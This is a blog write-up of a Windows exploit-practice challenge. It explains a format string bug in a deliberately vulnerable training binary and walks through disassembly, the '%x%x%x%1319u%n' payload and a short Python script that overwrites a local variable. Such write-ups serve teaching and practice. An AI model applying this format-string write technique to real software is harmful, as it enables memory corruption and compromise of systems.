Windows Exploitme: The Girl
Last time I mentioned that after completing Gerardo Richarte's Advanced Buffer Overflows challenge I wanted to make a incursion in Windows exploitation lands. As I said, I already had an eye on some juicy exploitmes for Windows for which I bring the first establishment. The exploitme in question is a simple exe file that performs a simple authentication procedure. Our mission this time will be to overwrite a local variable called id and make it print "1337". You can get the binary and my python written exploit from here. The vulnerability in question is a really simple Format String bug in one of the functions where it makes use of the fprintf() function without explicitly specifying a format; a textbook example. Let's take a look at the disassembly to get a deeper view:
.text:00401415 push ebp .text:00401416 mov ebp, esp .text:00401418 sub esp, 8 .text:0040141B mov eax, [ebp+arg_8] ; id .text:0040141E mov dword ptr [eax], 0FFFFFFFFh .text:00401424 mov eax, [ebp+arg_8] .text:00401427 cmp dword ptr [eax], 0FFFFFFFFh .text:0040142A jnz short locret_401440 .text:0040142C mov eax, [ebp+arg_0] ; load *username .text:0040142F mov [esp+8+var_4], eax .text:00401433 mov eax, ds:dword_404090 ; load *fd pointer .text:00401438 mov [esp+8+var_8], eax .text:0040143B call fprintfAs I said earlier, parameters are directly referenced without doing any kind of check. Now let's focus on how can we exploit this situation. If we run the executable inside a debugger and place a breakpoint in the right place (Placing it in 0x00401438 right next to the call tofprintf()did the job for me) we can see in the stack dump area that the format is a couple of dwords after our parameters. To be more precise our id field is placed exactly 4 dwords after the format string (Remember, the format string itself is stored in the stack). Theory tells us that using "%x" as format we increase the esp by one dword because we would be popping a unsigned integer in hex. Therefore all we need to do is climb a couple of words in the stack and make a write using the "%n" format parameter. Since the objective in this exploit is to write "1337" in the id field and "%n" writes the amount of bytes read so far to the current esp address, we need to increase this amount to make it "1337" in decimal. For this purpose we will make use of the "%u" format parameter. Recapping, our username field will have to show "%x%x%x%1319u%n" for the exploit to succeed. Here's a python snippet that will do the job, a whole working script is also packed alongside the binary in the zip I linked in the beginning.
import os username = "%x%x%x%1319u%n"+"\n" password = "insertrandomsequencehere()"+"\n" stdin,stdout=os.popen4("02-lizer-girl.exe") stdin.write(username + password) print stdout.read(100)That's it. Not a though guy this time, I just wanted to tinker a little bit in windows and get used to the new tools. Hope you guys enjoyed it as much as I did, see you around and don't forget to keep adding NOPs! :-)